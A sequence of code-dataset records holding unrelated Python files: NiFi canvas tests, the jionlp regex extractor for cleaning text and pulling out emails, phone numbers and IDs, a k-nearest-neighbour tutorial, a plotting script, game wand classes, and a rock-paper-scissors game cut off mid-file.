f_pg = fix_pg.generate()\n r1 = canvas.create_processor(\n parent_pg=f_pg,\n processor=canvas.get_processor_type('GenerateFlowFile'),\n location=(400.0, 400.0),\n name=conftest.test_processor_name\n )\n assert isinstance(r1, nifi.ProcessorEntity)\n assert r1.status.name == conftest.test_processor_name\n\n\ndef test_list_all_processors(fix_proc, regress):\n _ = fix_proc.generate()\n _ = fix_proc.generate()\n r = canvas.list_all_processors()\n assert len(r) >= 2\n assert isinstance(r[0], nifi.ProcessorEntity)\n\n\ndef test_get_processor(fix_proc, regress):\n f_p1 = fix_proc.generate()\n r1 = canvas.get_processor(f_p1.status.name)\n assert isinstance(r1, nifi.ProcessorEntity)\n r2 = canvas.get_processor('ClearlyNotAProcessor')\n assert r2 is None\n f_p2 = fix_proc.generate()\n r3 = canvas.get_processor(f_p1.status.name)\n assert isinstance(r3, list)\n r4 = 
canvas.get_processor(f_p2.id, 'id')\n assert isinstance(r4, nifi.ProcessorEntity)\n assert r4.id != r1.id\n\n\ndef test_schedule_processor(fix_proc):\n f_p1 = fix_proc.generate()\n r1 = canvas.schedule_processor(\n f_p1,\n True\n )\n status = canvas.get_processor(f_p1.id, 'id')\n assert r1 is True\n assert status.status.run_status == 'Running'\n r2 = canvas.schedule_processor(\n f_p1,\n False\n )\n status = canvas.get_processor(f_p1.id, 'id')\n assert status.status.run_status == 'Stopped'\n assert r2 is True\n with pytest.raises(AssertionError):\n _ = canvas.schedule_processor(\n f_p1,\n 'BANANA'\n )\n\n\ndef test_delete_processor(fix_proc, regress):\n f_p1 = fix_proc.generate()\n r1 = canvas.delete_processor(f_p1)\n assert r1.status is None\n assert isinstance(r1, nifi.ProcessorEntity)\n # try to delete processor twice\n with pytest.raises(ValueError):\n _ = canvas.delete_processor(f_p1)\n # try to delete running processor\n f_p2 = fix_proc.generate()\n canvas.schedule_processor(f_p2, True)\n with pytest.raises(ValueError):\n _ = canvas.delete_processor(f_p2)\n # and once more with feeling, er, force\n r2 = canvas.delete_processor(f_p2, force=True)\n assert r2.status is None\n\n\ndef test_update_processor(fix_proc, regress):\n # TODO: Add way more tests to this\n f_p1 = fix_proc.generate()\n update = nifi.ProcessorConfigDTO(\n scheduling_period='3s'\n )\n r1 = canvas.update_processor(f_p1, update)\n with pytest.raises(ValueError, match='update param is not an instance'):\n _ = canvas.update_processor(f_p1, 'FakeNews')\n\n\ndef test_get_variable_registry(fix_pg):\n test_pg = fix_pg.generate()\n r1 = canvas.get_variable_registry(test_pg)\n assert isinstance(r1, nifi.VariableRegistryEntity)\n with pytest.raises(ValueError, match='Unable to locate group with id'):\n canvas.delete_process_group(test_pg)\n _ = canvas.get_variable_registry(test_pg)\n\n\ndef test_update_variable_registry(fix_pg):\n test_pg = fix_pg.generate()\n r1 = canvas.update_variable_registry(\n test_pg,\n conftest.test_variable_registry_entry\n )\n assert isinstance(r1, nifi.VariableRegistryEntity)\n with pytest.raises(ValueError,\n match='param update is not a valid list of'\n ):\n _ = canvas.update_variable_registry(test_pg, '')\n\n\ndef test_get_connections():\n # TODO: Waiting for create_connection to generate fixture\n pass\n\n\ndef test_purge_connection():\n # TODO: Waiting for create_connection to generate fixture\n pass\n\n\ndef test_purge_process_group():\n # TODO: Waiting for create_connection to generate fixture\n pass\n\n\ndef test_get_bulletins():\n r = canvas.get_bulletins()\n assert isinstance(r, nifi.ControllerBulletinsEntity)\n\n\ndef test_get_bulletin_board():\n r = canvas.get_bulletin_board()\n assert isinstance(r, nifi.BulletinBoardEntity)\n","sub_path":"tests/test_canvas.py","file_name":"test_canvas.py","file_ext":"py","file_size_in_byte":8746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"112139628","text":"# -*- coding=utf-8 -*-\n# library: jionlp\n# author: dongrixinyu\n# license: Apache License 2.0\n# Email: dongrixinyu.89@163.com\n# github: https://github.com/dongrixinyu/JioNLP\n# description: Preprocessing tool for Chinese NLP\n\n\nimport os\nimport re\nimport pdb\n\nfrom .rule_pattern import *\n\n\n__all__ = ['Extractor']\n\n\nclass Extractor(object):\n \"\"\" 规则抽取器 \"\"\"\n def __init__(self):\n self.money_pattern = None\n self.email_pattern = None\n self.email_domain_pattern = None\n self.url_pattern = None\n self.phone_number_pattern = 
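# --- Added standalone sketch of the lazy-compilation idiom used throughout
# this class: patterns start as None and are compiled on first use, so
# importing the module stays cheap. LazyMatcher is an illustrative name.
import re

class LazyMatcher:
    def __init__(self):
        self._pattern = None              # compiled lazily

    def findall(self, text):
        if self._pattern is None:
            self._pattern = re.compile(r'\d+')  # compile once, on demand
        return self._pattern.findall(text)

# LazyMatcher().findall('a1b22') -> ['1', '22']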
None\n self.ip_address_pattern = None\n self.id_card_pattern = None\n self.html_tag_pattern = None\n self.qq_pattern = None\n self.strict_qq_pattern = None\n self.cell_phone_pattern = None\n self.landline_phone_pattern = None\n self.extract_parentheses_pattern = None\n self.remove_parentheses_pattern = None\n self.parentheses_pattern = PARENTHESES_PATTERN\n self.parentheses_dict = None\n self.redundent_pattern = None\n self.exception_pattern = None\n self.full_angle_pattern = None\n self.chinese_char_pattern = None\n\n @staticmethod\n def _extract_base(pattern, text, with_offset=False):\n \"\"\" 正则抽取器的基础函数\n\n Args:\n text(str): 字符串文本\n with_offset(bool): 是否携带 offset (抽取内容字段在文本中的位置信息)\n\n Returns:\n list: 返回结果\n\n \"\"\"\n if with_offset:\n '''\n if pattern == self.strict_qq_pattern:\n for item in pattern.finditer(text):\n pdb.set_trace()\n pdb.set_trace()\n #'''\n results = [{'text': item.group(1), \n 'offset': (item.span()[0] - 1, item.span()[1] - 1)}\n for item in pattern.finditer(text)]\n else:\n results = [item.group(1) for item in pattern.finditer(text)]\n \n return results\n\n def remove_redundant_char(self, text):\n \"\"\"生成 redundant\n\n Args:\n # redundant_char: 冗余字符集\n text: 待处理文本\n\n Returns:\n 正则pattern\n\n \"\"\"\n if self.redundent_pattern is None:\n pattern_list = list()\n for char in REDUNDENT_PATTERN:\n pattern_tmp = '(?<={char}){char}+'.format(\n char=re.escape(char))\n pattern_list.append(pattern_tmp)\n \n redundent_pattern = '|'.join(pattern_list)\n self.redundent_pattern = re.compile(redundent_pattern)\n \n return self.redundent_pattern.sub('', text)\n\n def clean_text(self, text, remove_html_tag=True,\n convert_full2half=True,\n remove_exception_char=True, remove_url=True,\n remove_redundant_char=True, remove_parentheses=True,\n remove_email=True, remove_phone_number=True):\n \"\"\" 清洗文本\n\n Args:\n text(str): 待清理文本\n remove_html_tag(bool): 是否删除html标签,如 等\n remove_exception_char(bool): 是否删除异常字符,如“敩衞趑”等\n convert_full2half(bool): 是否将全角字符转换为半角\n remove_redundant_char(bool): 是否删除冗余字符,如“\\n\\n\\n”,修剪为“\\n”\n remove_parentheses(bool): 是否删除括号及括号内内容,如“(记者:小丽)”\n remove_url(bool): 是否删除 url 链接\n remove_email(bool): 是否删除 email\n remove_phone_number(bool): 是否删除电话号码\n\n Returns:\n str: 清理后的文本\n\n \"\"\"\n \n if remove_html_tag:\n text = self.remove_html_tag(text)\n if remove_exception_char:\n text = self.remove_exception_char(text)\n if convert_full2half:\n text = self.convert_full2half(text)\n if remove_redundant_char:\n text = self.remove_redundant_char(text)\n if remove_parentheses:\n text = self.remove_parentheses(text)\n if remove_url:\n text = self.remove_url(text)\n if remove_email:\n text = self.remove_email(text)\n if remove_phone_number:\n text = self.remove_phone_number(text)\n\n return text\n \n def convert_full2half(self, text):\n \"\"\" 将全角字符转换为半角字符\n 其中分为空格字符和非空格字符\n \"\"\"\n if self.full_angle_pattern is None:\n self.full_angle_pattern = re.compile(FULL_ANGLE_ALPHABET)\n \n final_text_list = list()\n cursor = 0\n for item in self.full_angle_pattern.finditer(text):\n # 补充前段字符串\n if item.span()[0] == 0:\n pass\n else:\n final_text_list.append(text[cursor: item.span()[0]])\n \n # 替换\n for char in item.group():\n if char == '\\u3000': # 全角空格直接替换\n final_text_list.append(' ')\n else:\n final_text_list.append(chr(ord(char) - 65248))\n cursor = item.span()[1] \n \n if len(text) > cursor: # 补充最后的字符串\n final_text_list.append(text[cursor:])\n \n return ''.join(final_text_list)\n \n def extract_email(self, text, detail=False):\n \"\"\" 提取文本中的 E-mail\n\n Args:\n text(str): 
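# --- Added example for the full-width to half-width conversion above:
# full-width ASCII code points sit exactly 65248 (0xFEE0) above their
# half-width counterparts, and the full-width space U+3000 maps to ' '.
print(chr(ord('Ａ') - 65248))   # 'A'  (U+FF21 -> U+0041)
print(chr(ord('１') - 65248))   # '1'  (U+FF11 -> U+0031)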
字符串文本\n detail(bool): 是否携带 offset (E-mail 在文本中的位置信息)\n\n Returns:\n list: email列表\n\n \"\"\"\n if self.email_pattern is None:\n self.email_pattern = re.compile(EMAIL_PATTERN)\n \n text = ''.join(['#', text, '#'])\n results = self._extract_base(self.email_pattern, text, \n with_offset=detail)\n if not detail:\n return results\n else:\n if self.email_domain_pattern is None:\n self.email_domain_pattern = re.compile(EMAIL_DOMAIN_PATTERN)\n \n detail_results = list()\n for item in results:\n domain_name = self.email_domain_pattern.search(\n item['text']).group(1)\n item.update({'domain_name': domain_name})\n detail_results.append(item)\n return detail_results\n \n def extract_id_card(self, text, detail=False):\n \"\"\" 提取文本中的 ID 身份证号\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (身份证在文本中的位置信息)\n\n Returns:\n list: 身份证信息列表\n\n \"\"\"\n if self.id_card_pattern is None:\n self.id_card_pattern = re.compile(ID_CARD_PATTERN)\n\n text = ''.join(['#', text, '#'])\n return self._extract_base(self.id_card_pattern, text, \n with_offset=detail)\n \n def extract_ip_address(self, text, detail=False):\n \"\"\" 提取文本中的 IP 地址\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (IP 地址在文本中的位置信息)\n\n Returns:\n list: IP 地址列表\n\n \"\"\"\n if self.ip_address_pattern is None:\n self.ip_address_pattern = re.compile(IP_ADDRESS_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self._extract_base(self.ip_address_pattern, text, \n with_offset=detail)\n \n def extract_money(self, text):\n \"\"\"从文本中抽取出金额字符串,可以和 money_standardization 函数配合使用,\n 得到数字金额\n\n Args:\n text(str): 字符串文本\n\n Returns:\n list: email列表\n\n \"\"\"\n if self.money_pattern is None:\n self.money_pattern = re.compile(MONEY_PATTERN)\n \n res = list()\n for item in self.money_pattern.finditer(text):\n # print(item.group())\n res.append(item.group())\n \n return res\n \n def extract_phone_number(self, text, detail=False):\n \"\"\"从文本中抽取出电话号码\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (电话号码在文本中的位置信息)\n\n Returns:\n list: 电话号码列表\n\n \"\"\"\n if self.cell_phone_pattern is None:\n self.cell_phone_pattern = re.compile(CELL_PHONE_PATTERN)\n \n if self.landline_phone_pattern is None:\n self.landline_phone_pattern = re.compile(LANDLINE_PHONE_PATTERN)\n \n text = ''.join(['#', text, '#'])\n cell_results = self._extract_base(\n self.cell_phone_pattern, text, with_offset=detail)\n landline_results = self._extract_base(\n self.landline_phone_pattern, text, with_offset=detail)\n \n if not detail:\n return cell_results + landline_results\n else:\n detail_results = list()\n for item in cell_results:\n item.update({'type': 'cell_phone'})\n detail_results.append(item)\n for item in landline_results:\n item.update({'type': 'landline_phone'})\n detail_results.append(item)\n return detail_results\n \n def extract_qq(self, text, detail=False, strict=True):\n \"\"\"从文本中抽取出 QQ 号码\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (QQ 在文本中的位置信息)\n strict(bool): QQ号很容易和其他数字混淆,因此选择采用严格或宽松规则匹配\n\n Returns:\n list: email列表\n\n \"\"\"\n if self.qq_pattern is None:\n self.qq_pattern = re.compile(QQ_PATTERN)\n self.strict_qq_pattern = re.compile(STRICT_QQ_PATTERN)\n \n text = ''.join(['#', text, '#'])\n tmp_res = self._extract_base(\n self.qq_pattern, text, with_offset=detail)\n \n if not strict:\n return tmp_res\n else:\n # 将无法匹配 qq 字符的 qq 号删除\n match_flag = self.strict_qq_pattern.search(text)\n if match_flag:\n return tmp_res\n else:\n return list()\n \n def extract_url(self, text, detail=False):\n \"\"\"提取文本中的url链接\n\n Args:\n text(str): 字符串文本\n 
detail(bool): 是否携带 offset (URL 在文本中的位置信息)\n\n Returns:\n list: url列表\n\n \"\"\"\n if self.url_pattern is None:\n self.url_pattern = re.compile(URL_PATTERN)\n text = ''.join(['¥', text, '¥']) # 因 # 可出现于 url\n \n return self._extract_base(self.url_pattern, text, \n with_offset=detail)\n\n def _extract_parentheses(self, text, parentheses=PARENTHESES_PATTERN):\n # 额外分支 Ghs 提供的方法\n if self.extract_parentheses_pattern is None or self.parentheses_pattern != parentheses:\n import regex as reg\n self.parentheses_pattern = parentheses\n parentheses_per = zip(self.parentheses_pattern[:-1], self.parentheses_pattern[1:])\n self.extract_parentheses_pattern = f\"(?:{'|'.join('{left}([^{left}{right}]*){right}'.format(left=reg.escape(f), right=reg.escape(e)) for f, e in parentheses_per)})\"\n\n return [{'context': [j for j in i.groups() if j][0], 'offset': i.span(), 'origin': i.group()}\n for i in reg.compile(self.extract_parentheses_pattern).finditer(text)]\n\n def extract_parentheses(self, text, parentheses=PARENTHESES_PATTERN, detail=False):\n \"\"\" 提取文本中的括号及括号内内容,当有括号嵌套时,提取每一对\n 成对的括号的内容\n\n Args:\n text(str): 字符串文本\n parentheses: 要删除的括号类型,格式为:\n '左括号1右括号1左括号2右括号2...',必须为成对的括号如'{}()[]',\n 默认为self.parentheses\n detail: 是否打印括号内容位置信息\n\n Returns:\n list: [\n {\n 'context'(str): 'the context between parentheses',\n 'offset'(tuple): 'the location of extracted text'\n }, # 当 detail 为 True 时\n 'the context between parentheses', # 当 detail 为 False 时\n ...\n ]\n\n \"\"\"\n if self.extract_parentheses_pattern is None or self.parentheses_pattern != parentheses:\n self.parentheses_pattern = parentheses\n\n extract_pattern = '[' + re.escape(self.parentheses_pattern) + ']'\n extract_pattern = re.compile(extract_pattern)\n \n p_length = len(self.parentheses_pattern)\n\n parentheses_dict = dict()\n for i in range(0, p_length, 2):\n value = self.parentheses_pattern[i]\n key = self.parentheses_pattern[i + 1]\n parentheses_dict.update({key: value})\n \n self.parentheses_dict = parentheses_dict\n self.extract_parentheses_pattern = extract_pattern\n\n content_list = list()\n parentheses_list = list()\n idx_list = list()\n finditer = self.extract_parentheses_pattern.finditer(text)\n for i in finditer:\n idx = i.start()\n parentheses = text[idx]\n\n if parentheses in self.parentheses_dict.keys():\n if len(parentheses_list) > 0:\n if parentheses_list[-1] == self.parentheses_dict[parentheses]:\n parentheses_list.pop()\n if detail:\n start_idx = idx_list.pop()\n end_idx = idx + 1\n content_list.append(\n {'content': text[start_idx: end_idx],\n 'offset': (start_idx, end_idx)})\n else:\n content_list.append(text[idx_list.pop(): idx + 1])\n else:\n parentheses_list.append(parentheses)\n idx_list.append(idx)\n \n return content_list\n\n def remove_email(self, text):\n \"\"\" 删除文本中的 email\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除 email 后的文本\n\n \"\"\"\n if self.email_pattern is None:\n self.email_pattern = re.compile(EMAIL_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self.email_pattern.sub('', text)[1:-1]\n\n def remove_exception_char(self, text):\n \"\"\" 删除文本中的异常字符\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除异常字符后的文本\n \"\"\"\n if self.exception_pattern is None:\n self.exception_pattern = re.compile(EXCEPTION_PATTERN)\n \n return self.exception_pattern.sub(' ', text)\n\n def remove_html_tag(self, text):\n \"\"\" 删除文本中的 html 标签\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除 html 标签后的文本\n\n \"\"\"\n if self.html_tag_pattern is None:\n self.html_tag_pattern = re.compile(HTML_TAG_PATTERN)\n return 
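# --- Added standalone sketch of the stack-based pairing idea behind
# extract_parentheses: push openers, pop on the matching closer, so inner
# pairs are emitted before outer ones. match_pairs is an illustrative helper.
def match_pairs(text, pairs={')': '(', ']': '['}):
    stack, out = [], []
    for i, ch in enumerate(text):
        if ch in pairs.values():
            stack.append(i)
        elif ch in pairs and stack and text[stack[-1]] == pairs[ch]:
            out.append(text[stack.pop():i + 1])
    return out

# match_pairs('a(b(c)d)e') -> ['(c)', '(b(c)d)']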
re.sub(self.html_tag_pattern, '', text)\n \n def remove_id_card(self, text):\n \"\"\" 删除文本中的身份证号\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除身份证 id 后的文本\n\n \"\"\"\n if self.id_card_pattern is None:\n self.id_card_pattern = re.compile(ID_CARD_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self.id_card_pattern.sub('', text)[1:-1]\n \n def remove_ip_address(self, text):\n \"\"\" 删除文本中的 ip 地址\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除 ip 地址后的文本\n\n \"\"\"\n if self.ip_address_pattern is None:\n self.ip_address_pattern = re.compile(IP_ADDRESS_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self.ip_address_pattern.sub('', text)[1:-1]\n \n def remove_parentheses(self, text, parentheses=PARENTHESES_PATTERN):\n \"\"\" 删除文本中的括号及括号内内容\n\n Args:\n text(str): 字符串文本\n parentheses: 要删除的括号类型,格式为:\n '左括号1右括号1左括号2右括号2...',必须为成对的括号如'{}()[]',\n 默认为self.parentheses\n\n Returns:\n str: 删除括号及括号中内容后的文本\n\n \"\"\"\n if self.remove_parentheses_pattern is None or self.parentheses_pattern != parentheses:\n self.parentheses_pattern = parentheses\n\n p_length = len(self.parentheses_pattern)\n remove_pattern_list = list()\n remove_pattern_format = '{left}[^{left}{right}]*{right}'\n \n for i in range(0, p_length, 2):\n left = re.escape(self.parentheses_pattern[i])\n right = re.escape(self.parentheses_pattern[i + 1])\n remove_pattern_list.append(\n remove_pattern_format.format(left=left, right=right))\n \n remove_pattern = '|'.join(remove_pattern_list)\n remove_pattern = re.compile(remove_pattern)\n\n self.remove_parentheses_pattern = remove_pattern\n\n length = len(text)\n while True:\n text = self.remove_parentheses_pattern.sub('', text)\n if len(text) == length:\n return text\n length = len(text)\n\n def remove_phone_number(self, text):\n \"\"\" 删除文本中的电话号码\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除电话号码后的文本\n\n \"\"\"\n if self.cell_phone_pattern is None:\n self.cell_phone_pattern = re.compile(CELL_PHONE_PATTERN)\n \n if self.landline_phone_pattern is None:\n self.landline_phone_pattern = re.compile(LANDLINE_PHONE_PATTERN)\n \n text = ''.join(['#', text, '#'])\n text = self.cell_phone_pattern.sub('', text)\n text = self.landline_phone_pattern.sub('', text)\n \n return text[1:-1]\n \n def remove_qq(self, text, strict=True):\n \"\"\" 删除文本中的电 QQ 号\n\n Args:\n text(str): 字符串文本\n strict(bool): QQ 号容易与其他数字混淆,因此选择严格规则或宽松规则\n\n Returns:\n str: 删除 QQ 后的文本\n\n \"\"\"\n if self.qq_pattern is None:\n self.qq_pattern = re.compile(QQ_PATTERN)\n self.strict_qq_pattern = re.compile(STRICT_QQ_PATTERN) \n\n if strict:\n # 将无法匹配 qq 字符的文本直接返回\n match_flag = self.strict_qq_pattern.search(text)\n if not match_flag:\n return text\n \n text = ''.join(['#', text, '#'])\n return self.qq_pattern.sub('', text)[1:-1]\n \n def remove_url(self, text):\n \"\"\" 删除文本中的 url 链接\n\n Args:\n text(str): 字符串文本\n\n Returns:\n text: 删除 url 链接后的文本\n\n \"\"\"\n if self.url_pattern is None:\n self.url_pattern = re.compile(URL_PATTERN)\n \n text = ''.join(['¥', text, '¥'])\n return self.url_pattern.sub('', text)[1:-1]\n\n def replace_chinese(self, text):\n \"\"\" 删除文本中的所有中文字符串\n\n 将中文文字,替换为空格\n\n \"\"\"\n if text == '':\n return []\n if self.chinese_char_pattern is None:\n self.chinese_char_pattern = re.compile(CHINESE_CHAR_PATTERN)\n \n text_without_chinese = self.chinese_char_pattern.sub(r' ', text)\n return text_without_chinese\n\n # {'phone': '18100065143', 'province': '上海', 'city': '上海',\n # 'zip_code': '200000', 'area_code': '021', 'phone_type': '电信'}\n\n def check_chinese_char(self, text):\n \"\"\" 检查文本中是否包含中文字符 
\"\"\"\n if text == '':\n return False\n if self.chinese_char_pattern is None:\n self.chinese_char_pattern = re.compile(CHINESE_CHAR_PATTERN)\n\n if self.chinese_char_pattern.search(text):\n return True\n\n return False\n\n","sub_path":"jionlp/rule/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":21066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627746471","text":"import math\n\n'''\nThe following dataset is what we call the training dataset,\nbecause we will \"train\" our algorithm with it. The two \nnumbers are x and y coordinates, and the string is the class\nthat the datapoint at those coordinates belongs to.\nNotice the points closer to the origin are 'foos' and further\naway are 'bars'\n'''\ntraining_data = [[0,0,'foo'], [0,1,'foo'], [1,0,'foo'], [2,1,'foo'], [3,0,'foo'],\n[5,4,'bar'], [6,8,'bar'], [7,9,'bar'], [7,7,'bar'], [8,9,'bar']]\n\n#The following function clalculates the Euclidean Distanct between two sets of data.\n#In our case, the two sets of data are a pair of the x,y,class lists.\n#Note that your data structure could be many data points long, not just 2 like\n#in this example (x and y).\n\n#Note also that by using the range(len(data1)-1), we make sure to ignore the last\n#position in the data, which in our case is 'foo' or 'bar'\ndef euclidean_distance(xy1, xy2):\n\tc_squared = 0.0\n\tfor i in range(len(xy1)-1):\n\t\tc_squared += (float(xy1[i]) - float(xy2[i]))**2\n\t'''\n\tAnother way to write lines 23 and 24 is:\n\ta = xy1[0]-xy2[0]\n\tb = xy1[1]-xy2[1]\n\tc_squared = a**2 + b**2\n\t'''\n\treturn math.sqrt(c_squared)\n\n#The following function uses the distance function from above to calculate\n#each of the distances between the data point we want to classify and each\n#of the datasets we have in our training data. Basically, find the closest\n#points in the training_data to a new x,y coordinate.\n#Next, it sorts the results by the distances calculated (smallest first).\n#Finally, it trims the list to only k nearest neighbors\ndef get_neighbors(train_dataset, test_data, k):\n\tdists = []\n\tfor train_data in train_dataset:\n\t\tdist = euclidean_distance(test_data, train_data)\n\t\tdists.append((dist,train_data))\n\t\n\tdists.sort()\n\tneighbors = []\n\tfor i in range(k):\n\t\tneighbors.append(dists[i][1])\n\treturn neighbors\n\n#The following function uses the get_neighbors function from above, then\n#figures out which class has the most neighbors in it to predict the\n#most likely class that a new dataset belongs in. 
Basically, given the\n#closest neighbors to this new coordinate, how many are 'foo' and how\n#many are 'bar,' this new coordinate probably belongs to the majority.\ndef predict(train_dataset, test_data, k):\n\tneighbors = get_neighbors(train_dataset, test_data, k)\n\toutput_values = []\n\tcount_foo = 0\n\tcount_bar = 0\n\tfor n in neighbors:\n\t\tif n[-1] == 'foo':\n\t\t\tcount_foo += 1\n\t\telse:\n\t\t\tcount_bar += 1\n\tif count_foo > count_bar:\n\t\tprediction = 'foo'\n\telif count_foo < count_bar:\n\t\tprediction = 'bar'\n\telse:\n\t\tprediction = 'Could not classify'\n\treturn prediction\n\nprint(predict(training_data, [20,10], 3))\n\n","sub_path":"CS62/Session2/kneighbor.py","file_name":"kneighbor.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"355068478","text":"from mini_plot_tool import MiniPlotTool\nfrom csi_soap_test import *\n\nif __name__ == \"__main__\":\n baseConfig = {\n # 'figsize' : (6,8),\n # 'axis': [0,10,0,10],\n 'title' : 'query patient',\n 'ylabel' : 'time(s)',\n 'grid': True,\n 'xaxis_locator' : 2,\n #'yaxis_locator' : 0.1,\n # 'legend_loc' : 'upper right'\n }\n tool_query_patient = MiniPlotTool(baseConfig)\n\n csoap_test = CsiSoapTest(\"d:\\\\csi_use_csoap.log\")\n gsopa_test = CsiSoapTest(\"d:\\\\csi_use_gsoap.log\")\n\n X = [i for i in range(20)]\n Y1 = csoap_test.queryPatient()\n Y2 = gsopa_test.queryPatient()\n\n lineConf = {\n 'X': X,\n 'Y': Y1,\n # 'marker' : 'x',\n # 'color' : 'b',\n # 'markerfacecolor' : 'r',\n 'label' : 'use_csoap',\n # 'linewidth' : 3,\n # 'linestyle' : '--'\n }\n lineConf2 = {\n 'X': X,\n 'Y': Y2,\n 'marker': 'o',\n 'color': 'b',\n 'markerfacecolor': 'r',\n 'label': 'use_gsoap',\n 'linewidth': 3,\n 'linestyle': '--'\n }\n # tool.plotSingleLine(lineConf)\n tool_query_patient.addline(lineConf)\n tool_query_patient.addline(lineConf2)\n\n # print tool.removeline(1)\n tool_query_patient.plot()\n tool_query_patient.show()\n","sub_path":"csi_test/query_patient.py","file_name":"query_patient.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"597253155","text":"from .Weapons import Wand\r\n\r\nclass OakWand(Wand):\r\n def __init__(self, name=\"Oak Wand\", value=10, weight=0.5,\r\n strBuff=0, agiBuff=0, intBuff=5, damage=2, actionCost=3, scaleValue=1.0, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 0, 2])\r\n self.setDamage(-1, 1)\r\n self.setWeight(-0.1, 0.2)\r\n\r\n\r\nclass BirchWand(Wand):\r\n def __init__(self, name=\"Birch Wand\", value=25, weight=0.6,\r\n strBuff=0, agiBuff=0, intBuff=7, damage=3, actionCost=3, scaleValue=1.3, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 0, 3])\r\n self.setDamage(-2, 3)\r\n self.setWeight(-0.2, 0.3)\r\n\r\n\r\nclass DogwoodWand(Wand):\r\n def __init__(self, name=\"Dogwood Wand\", value=35, weight=0.7,\r\n strBuff=0, agiBuff=2, intBuff=6, damage=2, actionCost=2, scaleValue=1.9, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 1, 3])\r\n self.setDamage(-1, 3)\r\n self.setWeight(-0.2, 0.3)\r\n\r\n\r\nclass HemlockWand(Wand):\r\n def __init__(self, name=\"Hemlock Wand\", value=45, weight=0.4,\r\n strBuff=0, agiBuff=10, intBuff=5, damage=5, 
actionCost=4, scaleValue=2.5, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 5, 3])\r\n self.setDamage(-1, 3)\r\n self.setWeight(-0.1, 0.3)\r\n\r\n\r\nclass WalnutWand(Wand):\r\n def __init__(self, name=\"Walnut Wand\", value=55, weight=1.5,\r\n strBuff=0, agiBuff=3, intBuff=7, damage=7, actionCost=7, scaleValue=3.0, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 1, 4])\r\n self.setDamage(-1, 4)\r\n self.setWeight(-0.1, 0.4)\r\n\r\n\r\nclass SycamoreWand(Wand):\r\n def __init__(self, name=\"Sycamore Wand\", value=65, weight=1.5,\r\n strBuff=2, agiBuff=5, intBuff=10, damage=9, actionCost=7, scaleValue=3.5, tier=6):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 2, 7])\r\n self.setDamage(-1, 5)\r\n self.setWeight(-0.2, 0.3)\r\n\r\n\r\nclass ElderWand(Wand):\r\n def __init__(self, name=\"Elder Wand\", value=75, weight=1,\r\n strBuff=3, agiBuff=12, intBuff=15, damage=13, actionCost=10, scaleValue=4.0, tier=7):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([1, 10, 12])\r\n self.setDamage(-2, 5)\r\n self.setWeight(-0.5, 0.7)\r\n","sub_path":"Content/Items/Weapons/Wands.py","file_name":"Wands.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"391615177","text":"import random\r\n\r\n\r\ndef play_game():\r\n '''\r\n Game Rule:\r\n\r\n If a rock and scissors are formed, the rock wins, because a rock can smash scissors.\r\n If scissors and paper are formed, the scissors win, because scissors can cut paper.\r\n If paper and a rock are formed, the paper wins, because a sheet of paper can cover a rock. '''\r\n\r\n print('scissors (s) or paper (p) or rock (r) \\n')\r\n choices = ['s', 'p', 'r']\r\n\r\n try:\r\n while True:\r\n random_choice = random.choice(choices)\r\n user_input = str(input('Whats your choice?:'))\r\n\r\n if user_input == '' or user_input == ' ':\r\n print('Blank input... scissors (s) or paper (p) or rock (r) was expected ...\\n')\r\n\r\n elif user_input == 's' and random_choice == 'p':\r\n print('You Own!\\n')\r\n\r\n elif user_input == 'p' and random_choice == 'r':\r\n print('You Own!\\n')\r\n\r\n elif user_input == 'r' and random_choice == 's':\r\n print('You Own!\\n')\r\n\r\n elif user_input == 'p' and random_choice == 's':\r\n print('You Lost! \\n')\r\n\r\n elif user_input == 'r' and random_choice == 'p':\r\n print('You Lost! \\n')\r\n\r\n elif user_input == 's' and random_choice == 'r':\r\n print('You Lost! \\n')\r\n\r\n elif user_input == random_choice:\r\n print('Draw \\n')\r\n\r\n elif user_input != 's' or user_input != 'p' or user_input != 'r':\r\n print('scissors (s) or paper (p) or rock (r) was expected ...')\r\n\r\n print('Press \"Ctrl + c\" to exit .... 
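# --- Added design note (a compact alternative, not the author's version):
# the win/lose branches above collapse into one mapping of what each choice
# beats; beats/outcome are illustrative names.
beats = {'s': 'p', 'p': 'r', 'r': 's'}   # scissors>paper, paper>rock, rock>scissors

def outcome(user, computer):
    if user == computer:
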